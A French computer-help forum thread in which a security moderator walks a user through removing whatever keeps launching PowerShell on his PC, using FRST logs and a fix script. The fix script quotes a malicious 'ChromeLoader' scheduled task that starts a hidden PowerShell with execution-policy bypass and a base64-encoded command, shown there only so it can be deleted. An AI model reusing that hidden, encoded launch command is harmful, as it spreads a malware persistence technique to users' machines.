Powershell se lance tout seul

Résolu

Atone954 -
bazfile Messages postés 58591 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention - 12 janv. 2022 à 09:38

Bonjour,

Depuis un petit moment au démarrage et tout au long de l'utilisation powershell se lance tout seul avez vous une solution ?
Merci d'avance

Configuration: iPhone / Safari 15.1

Afficher la suite

A voir également:

Windows powershell s'ouvre tout seul
Clé windows 8 - Guide
Montage video windows - Guide
Windows ne démarre pas - Guide
Windows movie maker - Télécharger - Montage & Édition
Restauration systeme windows 10 - Guide

2 réponses

Réponse 1 / 2

bazfile Messages postés 58591 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 19 791

Bonjour,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis clique avec le bouton droit de ta souris sur FRST et choisi Exécuter en tant qu'administrateur tu auras ceci :

Clique sur Analyser

Attention de bien attendre que les messages disant que l'analyse est terminée s'affichent

À la fin de l'analyse tu auras deux fichiers texte sur le bureau FRST et Addition, .
Ensuite envoie les rapports FRST et ADDITION sur CJOINT voir CE TUTORIEL puis donne les deux liens générés par Cjoint dans ta réponse.

Atone954 Messages postés 2 Date d'inscription Statut Membre Dernière intervention

Merci pour ta réponse hyper rapide voici ce que j'ai.

https://www.cjoint.com/c/LAmheeeyvGA
https://www.cjoint.com/c/LAmhhNlr7ZA

bazfile Messages postés 58591 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention 19 791 > Atone954 Messages postés 2 Date d'inscription Statut Membre Dernière intervention

Tu as mis deux fois le rapport "addition" il manque le rapport "FRST".

Atone954 Messages postés 2 Date d'inscription Statut Membre Dernière intervention > bazfile Messages postés 58591 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention

Autant pour moi
https://www.cjoint.com/c/LAmhUy2y3xA

Désinstalle TotalAV avec Revo Uninstaller en mode scan avancé, ce pseudo-antivirus est une grosse arnaque.

Tutoriel Revo Uninstaller à lire attentivement.

Accepter la désinstallation du programme que l'on souhaite désinstaller et si il y a un message d'erreur disant que la désinstallation est impossible fermer le message d'erreur et continuer la procédure.

Cocher "Scan avancé" puis cliquer sur "Scan".

Cliquer sur "Sélectionner tout" puis sur "Supprimer" si une deuxième liste apparaît faire de même puis une fois que tout est supprimé cliquer sur "Fini" un redémarrage sera peut-être demandé.

Pour Powershell.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :

Start::
CreateRestorePoint:
CloseProcesses:
Task: {8EC3EE85-5E5C-44F6-ADBC-C0BC00D7FB43} - System32\Tasks\Opera GX scheduled Autoupdate 1641648155 => C:\Users\samja\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {BBB1F0A8-A950-4973-A8A8-7C4F44153983} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus).
CHR Extension: (Options) - C:\Users\samja\AppData\Local [2022-01-12]
2022-01-08 13:44 - 2022-01-08 13:44 - 000012830 _____ C:\Windows\system32\Tasks\ChromeLoader
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BakkesMod.lnk:14E057C8D9 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini:41964AA945 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk:BE32D07BC5 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk:E77773B271 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TechPowerUp GPU-Z.lnk:718E15FDE8 [10]
FirewallRules: [{7882BA77-C8CA-481C-BF51-FD37640EF509}] => (Allow) C:\Program Files\Cybelsoft\DriversCloud.com\DriversCloud.exe => Pas de fichier
FirewallRules: [{8F96C4F8-B043-4B5C-87F6-F6CF721571B5}] => (Allow) C:\Program Files\Cybelsoft\DriversCloud.com\DriversCloud.exe => Pas de fichier
FirewallRules: [{08842C27-EB20-468F-B7AD-E5E1E35B5831}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => Pas de fichier
FirewallRules: [{4B9DE5EE-184C-459F-82AE-F73FAF0E5BD4}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe => Pas de fichier
FirewallRules: [{D1EFA41F-6ED1-46C1-8033-3AB4B04E0102}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Pas de fichier
FirewallRules: [{BA72AE71-950A-4DF7-B270-D0E83217AB84}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Pas de fichier
FirewallRules: [TCP Query User{1524BDCB-9F1A-4555-9ACC-AD4D810A31E3}C:\users\samja\desktop\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe] => (Allow) C:\users\samja\desktop\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe => Pas de fichier
FirewallRules: [UDP Query User{BC18EB51-CC86-4CF7-B386-032BDAC794A0}C:\users\samja\desktop\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe] => (Allow) C:\users\samja\desktop\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe => Pas de fichier
FirewallRules: [TCP Query User{2697782F-8C8E-416E-B1E6-65672634E67F}C:\users\samja\documents\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe] => (Allow) C:\users\samja\documents\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe => Pas de fichier
FirewallRules: [UDP Query User{E1B4D8B2-F0D5-46DB-9D9D-0DB99A19FEB5}C:\users\samja\documents\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe] => (Allow) C:\users\samja\documents\five m\fivem.app\data\cache\subprocess\fivem_b2372_gtaprocess.exe => Pas de fichier
FirewallRules: [{86F69155-29C4-4104-9BAF-E0640C13CCFE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Black Ops\BlackOpsMP.exe => Pas de fichier
FirewallRules: [{3B6A55AC-C3DD-4F28-B03C-B5814F6416BD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Black Ops\BlackOpsMP.exe => Pas de fichier
FirewallRules: [{97F01B71-8511-43A5-841F-096797CDC345}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Black Ops\BlackOps.exe => Pas de fichier
FirewallRules: [{ADDEA6C9-6927-4AC2-BDCA-F186AB9B0609}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Black Ops\BlackOps.exe => Pas de fichier
FirewallRules: [{8D83DECA-80FF-4909-BF5B-F968A6388805}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe => Pas de fichier
FirewallRules: [{183B887F-1C2A-4284-AF1C-F63A56EE1DF0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5mp.exe => Pas de fichier
FirewallRules: [{60F17C87-B0E7-4F82-9071-6106A414D31A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe => Pas de fichier
FirewallRules: [{3DFFED2E-9DC5-45A4-A48F-ABED70675F53}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Call of Duty Modern Warfare 3\iw5sp.exe => Pas de fichier
FirewallRules: [TCP Query User{69BAEFEE-8A6A-4BD2-94BC-8F4B0C3190AF}C:\users\samja\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\samja\appdata\local\programs\opera gx\opera.exe => Pas de fichier
FirewallRules: [UDP Query User{8071653A-4CD0-4410-98C5-3FE25562AEF0}C:\users\samja\appdata\local\programs\opera gx\opera.exe] => (Allow) C:\users\samja\appdata\local\programs\opera gx\opera.exe => Pas de fichier
FirewallRules: [{FF84407D-A7D0-4A63-A988-1DCEC6473627}] => (Block) C:\users\samja\appdata\local\programs\opera gx\opera.exe => Pas de fichier
FirewallRules: [{EBD7F53E-D68B-42F6-80EB-3E3578D2570F}] => (Block) C:\users\samja\appdata\local\programs\opera gx\opera.exe => Pas de fichier
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT

Atone954 > bazfile Messages postés 58591 Date d'inscription Statut Modérateur, Contributeur sécurité Dernière intervention

Tout a l'air de fonctionner
https://www.cjoint.com/c/LAmilWysaDA
du coup ca viendrais de quoi au juste ?
Et au passage quel antivirus conseillez vous ?

Réponse 2 / 2

Atone954

Super merci beaucoup tu m'as sauvé la vie !
Très bonne journée a toi et bonne année !